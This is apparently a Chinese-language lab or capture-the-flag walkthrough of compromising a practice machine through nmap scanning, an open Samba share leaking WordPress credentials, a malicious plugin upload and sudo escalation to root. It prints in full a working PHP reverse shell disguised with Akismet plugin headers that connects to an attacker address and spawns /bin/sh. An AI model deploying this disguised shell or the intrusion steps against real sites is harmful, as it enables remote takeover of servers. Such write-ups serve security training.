盲打部分

信息搜集

经典扫C段:

1
sudo nmap -sn 61.139.2.0/24

定位到目标IP

扫端口:

1
sudo nmap --min-rate 10000 -p- 61.139.2.130

扫目录:

1
python dirsearch.py -u http://61.139.2.130/ -t 100000

我第一次知道这个dirsearch是可以用-t参数加线程的,为了方便我直接开100000

Web信息

杂七杂八的路径

/robots.txt
1
2
3
4
5
User-agent: *
Disallow: /old/
Disallow: /test/
Disallow: /TR2/
Disallow: /Backnode_files/
/test

什么鬼,给了个Apache的版本其他没用

/old

同上

/TR2

/Backnode_files

这里面有很多东西

但仔细翻翻都是些前端文件。

Phpinfo

dir之前爆出来的:/info.php

出现了phpinfo。

还有一大坨Disable_functions

phpmyadmin

/phpmyadmin路由下存在一个登录窗口。

/wordpress/wp-login.php

又一个登录框

Web渗透

我在想办法获取phpmyadmin的版本信息,好,卡住了。

看wp

Samba渗透

Samba是Linux系统中实现SMB协议的一个软件。

我们先用工具扫Samba中有什么文件:

关注到share$文件夹。

尝试进行连接,发现不用密码:

把上面能下载的东西下载下来:(get xxx) (mget .)

在里面看到wordpress文件夹,把例如config.php(泄露数据库账户或者密码)或者license.txt(可能可以看到wordpress版本而利用漏洞)等文件下载下来。

todolist.txt

license.txt

巨长一坨,目前没看到版本号,这里直接略过。

deets.txt(密码)

疑似泄露了什么密码

wp-config.php(数据库密码)

WordPress渗透

/wordpress/wp-login.php路由下有一个登录框:

直接尝试刚才wp-config中的账户和密码,成功登录。

在Plugins中有一个Add New选项,里面可以上传Plugin,想到可以传一个马进去:

这里似乎不能直接传入.php文件,需要传入一个zip文件,我们压缩一下就好?

发现还是不成功,检查一下Editor那边,发现php的插件都有些固定格式,我们可以伪装一下:

我把这些注释加上去,再试试。

六六六,盐都不带盐。

我这里苦于不知道把文件传进哪儿去了,我正想再传一次抓个包的时候,报错里面竟然显示了:

666开桂了。

我这里想弹shell但是不知道为什么弹补上,所以我索性直接用system命令在这个脚本上执行了。

这里的权限还是比较低。

还记得我们之前有一个12345的弱密码没用上吗,这里可以猜测这个Linux系统中还有别的用户,密码可能就是这个。

直接读/home目录下的文件:

果然有一个togie用户,我们用su命令切换到她。

发现问题了:

su命令只能在交互式的终端中使用。

我后来看了视频,发现这里反弹Shell只能写在php脚本里面,不能在system函数中执行命令来弹…

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
<?php
  /**
 * @package Akismet
 */
  /*
Plugin Name: Akismet Anti-Spam
Plugin URI: https://akismet.com/
Description: Used by millions, Akismet is quite possibly the best way in the world to <strong>protect your blog from spam</strong>. It keeps your site protected even while you sleep. To get started: activate the Akismet plugin and then go to your Akismet Settings page to set up your API key.
Version: 3.3.3
Author: Automattic
Author URI: https://automattic.com/wordpress-plugins/
License: GPLv2 or later
Text Domain: akismet
*/

  /*
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; either version 2
of the License, or (at your option) any later version.

This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
GNU General Public License for more details.

You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.

Copyright 2005-2015 Automattic, Inc.
*/

  // Make sure we don't expose any info if called directly

  set_time_limit (0);
$VERSION = "1.0";
$ip = '61.139.2.128';  // CHANGE THIS
$port = 1234;       // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;

//
// Daemonise ourself if possible to avoid zombies later
//

// pcntl_fork is hardly ever available, but will allow us to daemonise
// our php process and avoid zombies.  Worth a try...
if (function_exists('pcntl_fork')) {
  // Fork and have the parent process exit
  $pid = pcntl_fork();

  if ($pid == -1) {
    printit("ERROR: Can't fork");
    exit(1);
  }

  if ($pid) {
    exit(0);  // Parent exits
  }

  // Make the current process a session leader
  // Will only succeed if we forked
  if (posix_setsid() == -1) {
    printit("Error: Can't setsid()");
    exit(1);
  }

  $daemon = 1;
} else {
  printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");
}

// Change to a safe directory
chdir("/");

// Remove any umask we inherited
umask(0);

//
// Do the reverse shell...
//

// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
  printit("$errstr ($errno)");
  exit(1);
}

// Spawn shell process
$descriptorspec = array(
  0 => array("pipe", "r"),  // stdin is a pipe that the child will read from
  1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
  2 => array("pipe", "w")   // stderr is a pipe that the child will write to
);

$process = proc_open($shell, $descriptorspec, $pipes);

if (!is_resource($process)) {
  printit("ERROR: Can't spawn shell");
  exit(1);
}

  // Set everything to non-blocking
// Reason: Occsionally reads will block, even though stream_select tells us they won't
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);

printit("Successfully opened reverse shell to $ip:$port");

while (1) {
    // Check for end of TCP connection
    if (feof($sock)) {
        printit("ERROR: Shell connection terminated");
        break;
    }

    // Check for end of STDOUT
    if (feof($pipes[1])) {
        printit("ERROR: Shell process terminated");
        break;
    }

    // Wait until a command is end down $sock, or some
    // command output is available on STDOUT or STDERR
    $read_a = array($sock, $pipes[1], $pipes[2]);
    $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);

    // If we can read from the TCP socket, send
    // data to process's STDIN
    if (in_array($sock, $read_a)) {
        if ($debug) printit("SOCK READ");
        $input = fread($sock, $chunk_size);
        if ($debug) printit("SOCK: $input");
        fwrite($pipes[0], $input);
    }

    // If we can read from the process's STDOUT
    // send data down tcp connection
    if (in_array($pipes[1], $read_a)) {
        if ($debug) printit("STDOUT READ");
        $input = fread($pipes[1], $chunk_size);
        if ($debug) printit("STDOUT: $input");
        fwrite($sock, $input);
    }

    // If we can read from the process's STDERR
    // send data down tcp connection
    if (in_array($pipes[2], $read_a)) {
        if ($debug) printit("STDERR READ");
        $input = fread($pipes[2], $chunk_size);
        if ($debug) printit("STDERR: $input");
        fwrite($sock, $input);
    }
}

fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);

// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
function printit ($string) {
    if (!$daemon) {
        print "$string\n";
    }
}

?>

成功连接:

权限很低

发现还是无法直接用su切换到togie

后来我搜了一下才知道,问题出在这里。

刚开始反弹Shell建立连接时,回显了:

解决办法有:

办法一失败,尝试办法二:

python -c命令可以正常运行

成功连接。

密码是12345,前面已知晓。

sudo -l发现sudo状态下可以运行所有命令

直接用sudo开一个终端,即是root权限:

查看/root目录下有什么东西,发现凭证proof.txt,渗透完成。